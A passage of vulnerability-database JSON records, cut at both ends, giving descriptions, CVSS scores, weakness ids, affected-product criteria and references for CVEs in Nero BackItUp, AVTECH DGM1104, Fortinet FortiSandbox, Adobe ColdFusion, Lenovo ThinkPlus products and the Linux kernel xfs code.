(.COM/.EXE/.BAT/.CMD). The issue affects recent Nero BackItUp product lines (2019-2025 and earlier) and has been acknowledged by the vendor."}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H","baseScore":8.6,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":6.0}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-22"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:nero:backitup:*:*:*:*:*:*:*:*","versionEndIncluding":"2025","matchCriteriaId":"C0417A0B-91DC-49AE-B1D5-0280F523AC70"}]}]}],"references":[{"url":"https://github.com/PotatoHamm/Nero-Productline-Vulnerability","source":"cve@mitre.org","tags":["Exploit","Third Party Advisory"]}]}},{"cve":{"id":"CVE-2025-57201","sourceIdentifier":"cve@mitre.org","published":"2025-12-03T16:15:57.137","lastModified":"2026-06-01T12:21:51.393","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 was discovered to contain an authenticated command injection vulnerability in the SMB server function. This vulnerability allows attackers to execute arbitrary commands via a crafted input."}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-77"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:avtech:dgm1104_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"2EE9FE6D-6B3B-4244-84A6-7CA780064BE4"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:avtech:dgm1104:-:*:*:*:*:*:*:*","matchCriteriaId":"C94DD873-8D0F-4703-A27C-8DBCAE839BBC"}]}]}],"references":[{"url":"http://avtech.com","source":"cve@mitre.org","tags":["Product"]},{"url":"http://dgm1104.com","source":"cve@mitre.org","tags":["Broken Link"]},{"url":"https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2025-57201","source":"cve@mitre.org","tags":["Exploit","Third Party Advisory"]}]}},{"cve":{"id":"CVE-2025-53679","sourceIdentifier":"psirt@fortinet.com","published":"2025-12-09T18:15:53.477","lastModified":"2026-06-01T12:20:05.217","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions, FortiSandbox Cloud 24.1, FortiSandbox Cloud 23 all versions allows a remote privileged attacker to execute unauthorized code or commands via crafted HTTP or HTTPS requests."}],"metrics":{"cvssMetricV31":[{"source":"psirt@fortinet.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","baseScore":7.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.2,"impactScore":5.9}]},"weaknesses":[{"source":"psirt@fortinet.com","type":"Secondary","description":[{"lang":"en","value":"CWE-78"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndExcluding":"4.4.8","matchCriteriaId":"C0B145A7-83A1-4ED2-A9DC-109CAB0AB217"},{"vulnerable":true,"criteria":"cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*","versionStartIncluding":"5.0.0","versionEndExcluding":"5.0.3","matchCriteriaId":"7A1CEA31-8309-4B13-8A3C-4830394A728D"},{"vulnerable":true,"criteria":"cpe:2.3:a:fortinet:fortisandbox_cloud:*:*:*:*:*:*:*:*","versionStartIncluding":"23.1.4245","versionEndExcluding":"23.4.4374","matchCriteriaId":"31574D18-7175-4634-B191-99080F0FAF2F"},{"vulnerable":true,"criteria":"cpe:2.3:a:fortinet:fortisandbox_cloud:24.1.4436:*:*:*:*:*:*:*","matchCriteriaId":"529FB46C-C0E5-43F5-A753-DD9E928FD4E6"}]}]}],"references":[{"url":"https://fortiguard.fortinet.com/psirt/FG-IR-25-454","source":"psirt@fortinet.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2025-61813","sourceIdentifier":"psirt@adobe.com","published":"2025-12-10T00:16:09.990","lastModified":"2026-06-01T12:19:31.863","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files on the server. Exploitation of this issue does requires user interaction and scope is changed."}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:L","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":4.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N","baseScore":7.4,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":4.0}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-611"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:-:*:*:*:*:*:*","matchCriteriaId":"7A94B406-C011-4673-8C2B-0DD94D46CC4C"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update1:*:*:*:*:*:*","matchCriteriaId":"AFD05E3A-10F9-4C75-9710-BA46B66FF6E6"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update10:*:*:*:*:*:*","matchCriteriaId":"F1FC7D1D-6DD2-48B2-980F-B001B0F24473"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update11:*:*:*:*:*:*","matchCriteriaId":"1FA19E1D-61C2-4640-AF06-4BCFE750BDF3"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update12:*:*:*:*:*:*","matchCriteriaId":"3F331DEA-F3D0-4B13-AB1E-6FE39B2BB55D"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update13:*:*:*:*:*:*","matchCriteriaId":"63D5CF84-4B0D-48AE-95D6-262AEA2FFDE8"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update14:*:*:*:*:*:*","matchCriteriaId":"10616A3A-0C1C-474A-BD7D-A2A5BB870F74"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update15:*:*:*:*:*:*","matchCriteriaId":"D7DA523E-1D9B-45FD-94D9-D4F9F2B9296B"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update16:*:*:*:*:*:*","matchCriteriaId":"151AFF8B-F05C-4D27-85FC-DF88E9C11BEA"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update17:*:*:*:*:*:*","matchCriteriaId":"53A0E245-2915-4DFF-AFB5-A12F5C435702"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update18:*:*:*:*:*:*","matchCriteriaId":"C5653D18-7534-48A3-819F-9F049A418F99"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update19:*:*:*:*:*:*","matchCriteriaId":"BABC6468-A780-4080-A930-4125D1B39C51"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update2:*:*:*:*:*:*","matchCriteriaId":"D57C8681-AC68-47DF-A61E-B5C4B4A47663"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update20:*:*:*:*:*:*","matchCriteriaId":"F58633C9-E957-46B7-8F5B-B060A8726E33"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update21:*:*:*:*:*:*","matchCriteriaId":"3CF83653-86BB-461A-87F8-65D99EF2276E"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update22:*:*:*:*:*:*","matchCriteriaId":"C2C67E15-22DE-44C0-8CB1-9AF8FCF09FA5"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update3:*:*:*:*:*:*","matchCriteriaId":"75608383-B727-48D6-8FFA-D552A338A562"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update4:*:*:*:*:*:*","matchCriteriaId":"7773DB68-414A-4BA9-960F-52471A784379"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update5:*:*:*:*:*:*","matchCriteriaId":"B38B9E86-BCD5-4BCA-8FB7-EC55905184E6"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update6:*:*:*:*:*:*","matchCriteriaId":"5E7BAB80-8455-4570-A2A2-8F40469EE9CC"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update7:*:*:*:*:*:*","matchCriteriaId":"F9D645A2-E02D-4E82-A2BD-0A7DE5B8FBCC"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update8:*:*:*:*:*:*","matchCriteriaId":"6E22D701-B038-4795-AA32-A18BC93C2B6F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update9:*:*:*:*:*:*","matchCriteriaId":"CAC4A0EC-C3FC-47D8-86CE-0E6A87A7F0B0"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:-:*:*:*:*:*:*","matchCriteriaId":"B02A37FE-5D31-4892-A3E6-156A8FE62D28"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update1:*:*:*:*:*:*","matchCriteriaId":"0AA3D302-CFEE-4DFD-AB92-F53C87721BFF"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update10:*:*:*:*:*:*","matchCriteriaId":"645D1B5F-2DAB-4AB8-A465-AC37FF494F95"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update11:*:*:*:*:*:*","matchCriteriaId":"ED6D8996-0770-4C9F-BEA5-87EA479D40A5"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update12:*:*:*:*:*:*","matchCriteriaId":"4836086E-3D4A-4A07-A372-382D385CB490"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update13:*:*:*:*:*:*","matchCriteriaId":"CBC19168-4184-4B59-B9C8-E98844124EED"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update14:*:*:*:*:*:*","matchCriteriaId":"A60DCD92-9A5B-411C-9554-642C91D77FAE"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update15:*:*:*:*:*:*","matchCriteriaId":"58CC65EF-60A3-4DFA-AA51-E5013F116CEA"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update16:*:*:*:*:*:*","matchCriteriaId":"2E3EBFB1-4488-4924-A2E2-B7E422D68345"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update2:*:*:*:*:*:*","matchCriteriaId":"EB88D4FE-5496-4639-BAF2-9F29F24ABF29"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update3:*:*:*:*:*:*","matchCriteriaId":"43E0ED98-2C1F-40B8-AF60-FEB1D85619C0"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update4:*:*:*:*:*:*","matchCriteriaId":"76204873-C6E0-4202-8A03-0773270F1802"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update5:*:*:*:*:*:*","matchCriteriaId":"C1A22BE9-0D47-4BA8-8BDB-9B12D7A0F7C7"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update6:*:*:*:*:*:*","matchCriteriaId":"E3A83642-BF14-4C37-BD94-FA76AABE8ADC"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update7:*:*:*:*:*:*","matchCriteriaId":"A892E1DC-F2C8-4F53-8580-A2D1BEED5A25"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update8:*:*:*:*:*:*","matchCriteriaId":"DB97ADBA-C1A9-4EE0-9509-68CB12358AE5"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update9:*:*:*:*:*:*","matchCriteriaId":"E17C38F0-9B0F-4433-9CBD-6E3D63EA9BDC"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2025:-:*:*:*:*:*:*","matchCriteriaId":"30779417-D4E5-4A01-BE0E-1CE1D134292A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2025:update1:*:*:*:*:*:*","matchCriteriaId":"80D7FC6A-F264-4CB1-A18D-B091EBA47882"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2025:update2:*:*:*:*:*:*","matchCriteriaId":"E3DA0D20-93BA-4C76-A400-159853CD7277"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2025:update3:*:*:*:*:*:*","matchCriteriaId":"5BAB6F21-61F1-43AB-88BA-553CD9AD6C0E"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2025:update4:*:*:*:*:*:*","matchCriteriaId":"C85288B9-5D63-49EA-828A-8DB3BB2367F6"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2025-13453","sourceIdentifier":"psirt@lenovo.com","published":"2026-01-14T23:15:55.483","lastModified":"2026-06-01T12:20:03.347","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"A potential vulnerability was reported in some ThinkPlus USB drives that could allow a user with physical access to read data stored on the drive."},{"lang":"es","value":"Una posible vulnerabilidad fue reportada en algunas unidades USB ThinkPlus que podría permitir a un usuario con acceso físico leer datos almacenados en la unidad."}],"metrics":{"cvssMetricV40":[{"source":"psirt@lenovo.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"PHYSICAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"psirt@lenovo.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":4.6,"baseSeverity":"MEDIUM","attackVector":"PHYSICAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":0.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":4.6,"baseSeverity":"MEDIUM","attackVector":"PHYSICAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":0.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@lenovo.com","type":"Secondary","description":[{"lang":"en","value":"CWE-311"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_fu100_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"5A5460E2-3400-4446-8D8D-8ED4E145A878"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_fu100:gen1:*:*:*:*:*:*:*","matchCriteriaId":"59ECD18D-2717-4BCD-8A1F-694DBF0A14A9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_fu200_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"F204BFBA-8BF6-453E-B3AC-27DD050F9F3D"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_fu200:gen1:*:*:*:*:*:*:*","matchCriteriaId":"9F88C86B-5FBA-4077-B312-33C9F848E4A5"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_tu800_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"5BE554C0-C967-4D36-9775-9DF07292A3E5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_tu800:gen1:*:*:*:*:*:*:*","matchCriteriaId":"22880F19-CD7D-4B04-B254-301AF9160CF8"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_tsd303_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"6CFE44C3-1470-4A6B-9533-D5C649C6FE7F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_tsd303:gen1:*:*:*:*:*:*:*","matchCriteriaId":"D221D223-8E21-4769-85AA-2DFFFA42552A"}]}]}],"references":[{"url":"https://iknow.lenovo.com.cn/detail/436983","source":"psirt@lenovo.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2025-13454","sourceIdentifier":"psirt@lenovo.com","published":"2026-01-14T23:15:55.647","lastModified":"2026-06-01T12:20:07.020","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"A potential vulnerability was reported in ThinkPlus configuration software that could allow a local authenticated user to gain access to sensitive device information."},{"lang":"es","value":"Una posible vulnerabilidad fue reportada en el software de configuración ThinkPlus que podría permitir a un usuario local autenticado obtener acceso a información sensible del dispositivo."}],"metrics":{"cvssMetricV40":[{"source":"psirt@lenovo.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.8,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"psirt@lenovo.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@lenovo.com","type":"Secondary","description":[{"lang":"en","value":"CWE-319"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_fu100_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"5A5460E2-3400-4446-8D8D-8ED4E145A878"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_fu100:gen1:*:*:*:*:*:*:*","matchCriteriaId":"59ECD18D-2717-4BCD-8A1F-694DBF0A14A9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_fu200_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"F204BFBA-8BF6-453E-B3AC-27DD050F9F3D"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_fu200:gen1:*:*:*:*:*:*:*","matchCriteriaId":"9F88C86B-5FBA-4077-B312-33C9F848E4A5"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_tu800_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"5BE554C0-C967-4D36-9775-9DF07292A3E5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_tu800:gen1:*:*:*:*:*:*:*","matchCriteriaId":"22880F19-CD7D-4B04-B254-301AF9160CF8"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_tsd303_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"6CFE44C3-1470-4A6B-9533-D5C649C6FE7F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_tsd303:gen1:*:*:*:*:*:*:*","matchCriteriaId":"D221D223-8E21-4769-85AA-2DFFFA42552A"}]}]}],"references":[{"url":"https://iknow.lenovo.com.cn/detail/436983","source":"psirt@lenovo.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-23252","sourceIdentifier":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","published":"2026-03-18T18:16:23.233","lastModified":"2026-06-01T14:07:25.660","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: get rid of the xchk_xfile_*_descr calls\n\nThe xchk_xfile_*_descr macros call kasprintf, which can fail to allocate\nmemory if the formatted string is larger than 16 bytes (or whatever the\nnofail guarantees are nowadays).  Some of them could easily exceed that,\nand Jiaming Zhang found a few places where that can happen with syzbot.\n\nThe descriptions are debugging aids and aren't required to be unique, so\nlet's just pass in static strings and eliminate this path to failure.\nNote this patch touches a number of commits, most of which were merged\nbetween 6.6 and 6.14."},{"lang":"es","value":"En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nxfs: eliminar las llamadas a xchk_xfile_*_descr\n\nLas macros xchk_xfile_*_descr llaman a kasprintf, lo que puede fallar al asignar memoria si la cadena formateada es mayor de 16 bytes (o cualesquiera que sean las garantías de nofail hoy en día). Algunas de ellas podrían exceder fácilmente eso, y Jiaming Zhang encontró algunos lugares donde eso puede ocurrir con syzbot.\n\nLas descripciones son ayudas de depuración y no se requiere que sean únicas, así que simplemente pasemos cadenas estáticas y eliminemos esta ruta de fallo. Nótese que este parche afecta a varios commits, la mayoría de los cuales fueron fusionados entre 6.6 y 6.14."}],"metrics":{"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":3.6}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.10","versionEndExcluding":"6.12.78","matchCriteriaId":"DA007D53-8D99-404A-8E76-341B5D45F5B3"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.13","versionEndExcluding":"6.18.16","matchCriteriaId":"B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.19","versionEndExcluding":"6.19.6","matchCriteriaId":"373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67